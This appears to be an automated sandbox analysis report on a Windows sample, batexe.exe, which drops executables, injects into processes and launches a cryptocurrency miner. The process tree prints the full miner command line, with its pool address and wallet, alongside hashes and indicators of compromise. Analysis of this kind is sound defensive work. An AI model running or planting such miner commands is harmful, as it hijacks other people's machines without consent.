Analysis
-
max time kernel
294s -
max time network
294s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
18/02/2024, 16:32
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231222-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation b2e.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation batexe.exe -
Executes dropped EXE 2 IoCs
pid Process 4468 b2e.exe 5176 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 5176 cpuminer-sse2.exe 5176 cpuminer-sse2.exe 5176 cpuminer-sse2.exe 5176 cpuminer-sse2.exe 5176 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4016-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4016 wrote to memory of 4468 4016 batexe.exe 84 PID 4016 wrote to memory of 4468 4016 batexe.exe 84 PID 4016 wrote to memory of 4468 4016 batexe.exe 84 PID 4468 wrote to memory of 5340 4468 b2e.exe 85 PID 4468 wrote to memory of 5340 4468 b2e.exe 85 PID 4468 wrote to memory of 5340 4468 b2e.exe 85 PID 5340 wrote to memory of 5176 5340 cmd.exe 88 PID 5340 wrote to memory of 5176 5340 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Users\Admin\AppData\Local\Temp\9E43.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\9E43.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9E43.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A103.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5340 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5176
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14.5MB
MD59a8d3c6c7682752769d2247ab4828004
SHA11568ec5fa1377dca7c394f98718d462d6b0b7358
SHA256a2da601d4ad777ce3f3538710a7c4707b271cd5d891811e69af0479566453364
SHA5127af0b69e1df8184ce263a009fe9babdeac1b56cb0fe4d23a9a2bc28cdfc9b16db4a0e03a375c88a5c1df6a7bcb6ff4f285806cc0763069c125e60961f3349f13
-
Filesize
5.9MB
MD5131e2af4f6990d2b508a7c958119b5e3
SHA1af6a3d286c73e8f5768a50cfcd0c844c47024071
SHA2561ae00565d29344792f58106358350e97bac1715569eb924789ff8b8488f89fe8
SHA5129694e617b5fea049eda73de0ae29f40b527a9a8f5e95bc044c801df67145b856e4cdaff2c56c353bc933ba2d6e12282bff07ce04486d61fc4e77e31832f0e812
-
Filesize
3.8MB
MD52186b555d2e36733888a82b2c090fbfa
SHA1db6c6b97eeff20c4538d6b13e8ccdb6e9e2a754b
SHA256a8b48225bd3dc6ffd440d81ede93d668ef868f094deb953fd2c983056a79eb6c
SHA512d120eb6e6a50469e912d89eb99880593cd625d4b4c3034c2228dbff49da8eb1c27b09e4d690e45295d5d719c21da2ce13fea09aa8808c0e5a0d9878f3dbca275
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.2MB
MD52f4ba4f249afe0bbcae9bfe84861a344
SHA1337c8bd17a595d7d2715e21ebc29dcee8a9ac235
SHA256c0bc0e20483eefb00522bf68a43caf35b0b5fe4a6d84821a01d8a92782ba2ad9
SHA512ab960d04cbc38b06a4ea4ad3d79c6b37f7e93eb6fdfdcf361e9678671ab182b7f33fd8871187704737f71609a7a41deb08bfd756eaad42ff2e0f1bbf800ac33e
-
Filesize
1.2MB
MD5486e74e99aedf526f5c39d149ba2c62a
SHA16484db1147743c12d9831be344e23633d661b94b
SHA2562cd89822d2a2be74138f2af4e5b0c826a828b561a8f6d46d9da85ff02e934853
SHA5129d57efb19bfd462e175e29825c23dbc1c2acad5a14353352621cd7758a027269be55edd4f817efc024cd0914db38002eb9ace07391f1a561a75dcb8d0ec0fd70
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.1MB
MD5c89e863ce2221a0f49b45a55100e468c
SHA1569ede311983a53a8f23f254fe37735538cbfa5e
SHA2565ca5fb55f2e5ddee30c893b0e78d1ad59f593c2c3e5ecc155f14a088c65cfb46
SHA512f65476f7353ef6ca7378752551c28736b61916cbf54f0a17b211a5a14ab93ddc2830a1d9c3cc1118117a23be95d49b06fc8a174d1a87f360ae4b96a6bbde04b0
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.3MB
MD5ca03742d33b84a13e3310da86ac13073
SHA19d4e695fefec9b9d5ad4c199d0078f94b3e8ef58
SHA2561608ea31cee00660111a5d395e52e8000a202d94b02d3c4b5eb408227d1f3fe6
SHA5122eaf28d0141deff75ba16331adcc2875974547ccc7b906c3ed27255b4288de092bfde2dbad463a4f84dbcc0981f5f0ac6ae2d7317e02710abb971dcf497a79a9
-
Filesize
1.1MB
MD5f8bbcaff5593971ab8ed368088585b9c
SHA1fcf527286183d4efb2cce8d175a33e54df0fb4a8
SHA256c78fa72f4e08f51dacdb5673f74ae23d38b18b247b21944a41af93730a85516f
SHA51211fcc91fe2fdfa67819e77a9183078b18a919c6904719a0666a2eb0f7baf442d2b97b55e373e775c05fde6d1a83da2e44c067912961f47bf7aef665bb9088334
-
Filesize
808KB
MD5b67ca12301073f3d594c36e578cc08b6
SHA175cc60f25b28746312cf97432a2f4806b725f051
SHA2566ade5aeeabc7ef6214aa7a5f7d96e9e7ff6e65e5e6af0c1187aa70b57cf7aa87
SHA5120361a6337b5ac5226765d2f3fcb65b6ef291a81968a5b06ff19d887f83b7b07f75f908c66d0b0394b7468a49c7756a19681ec53f7be77ba2cd137a383ddc36f5
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770